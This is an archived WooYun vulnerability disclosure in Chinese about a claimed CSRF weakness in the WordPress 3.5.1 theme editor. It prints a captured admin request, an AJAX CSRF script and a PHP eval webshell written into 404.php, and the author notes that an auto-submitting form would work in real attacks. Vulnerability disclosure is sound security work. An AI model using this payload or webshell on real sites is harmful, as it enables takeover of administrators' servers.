当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020878

漏洞标题:wordpress后台CSRF不严,管理员访问某些链接可拿shell

相关厂商:wordpress

漏洞作者: 小贱人

提交时间:2013-03-29 12:43

修复时间:2013-06-27 12:44

公开时间:2013-06-27 12:44

漏洞类型:CSRF

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-06-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

wordpress3.5.1后台修改主题模版处防CSRF不严,前台评论可加入超链接,可写上诱惑性东西 骗取管理员点击后写入一句话木马

详细说明:

进入后台-外观-编辑。选择编辑Twenty Twelve主题下的404.php文件。将原内容去掉,换成一句话木马,同时打开抓包工具。

1.png


更新后抓到包 

post http://localhost/wp/wp-admin/theme-editor.php
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp/wp-admin/theme-editor.php?file=404.php&theme=twentytwelve
Cookie: wordpress_1233097993469c07c80a9cb529880b71=admin%7C1364700254%7Cb875aa22d9bb88383aa6f9b1628dd86b; wp-settings-time-1=1364445495; comment_author_1233097993469c07c80a9cb529880b71=test; comment_author_email_1233097993469c07c80a9cb529880b71=632117384%40qq.com; wp-settings-1=editor%3Dhtml; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_1233097993469c07c80a9cb529880b71=admin%7C1364700254%7C082956c79c01926f6f107ccd131dade7; s5wJ_2132_saltkey=uNFgCP80; s5wJ_2132_lastvisit=1364366389; s5wJ_2132_ulastactivity=591affdyS6zMRtF88Jad%2BTVr47oX95MIizEQOFn8RMF%2BN%2FpUUHdw
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 268
_wpnonce=b6cda66293&_wp_http_referer=%2Fwp%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentytwelve&newcontent=%3C%3Fphp+eval%28%24_GET%5Ba%5D%29%3B%3F%3E&action=update&file=404.php&theme=twentytwelve&scrollto=0&submit=%E6%9B%B4%E6%96%B0%E6%96%87%E4%BB%B6


由于本地演示,用AJAX进行CSRF攻击。
编写localhost/wp.html文件。内容为

<script>
function CreateRquest(){
var httpRequest;
try{
httpRequest=new ActiveXObject("Msxml2.XMLHTTP");
}catch(e){
try{
httpRequest=new ActiveXObject("Microsoft.XMLHTTP");
}catch(e1){
httpRequest=new XMLHttpRequest();
}
}
return httpRequest;
}
var request=CreateRquest();
request.open("post","http://localhost/wp/wp-admin/theme-editor.php",true);
request.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
var a="_wpnonce=b6cda66293&_wp_http_referer=%2Fwp%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentytwelve&newcontent=<?php eval($_GET[a]);?>&action=update&file=404.php&theme=twentytwelve&scrollto=0&submit=%E6%9B%B4%E6%96%B0%E6%96%87%E4%BB%B6";
request.send(a);
</script>


将被修改的404.PHP恢复,并且在前台评论写入<a href="http://localhost/wp.html">管理员,有一篇文章也讲到了这个问题
管理员登录后台查看评论。点击链接后
Twenty Twelve主题下的404.php已被成功修改为一句话木马

2.png


访问一句话木马

3.png


攻击成功,AJAX仅为演示,实战中可用JS控制表单自动提交来实现跨域传输数据。

漏洞证明:

管理员点击相关链接后,成功在404页面写入一句话木马 并访问成功

.jpg


AJAX仅为本地测试用,实战中可在恶意页面中用JS控制表单自动提交。

修复方案:

你们比我懂

版权声明:转载请注明来源 小贱人@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:4 (WooYun评价)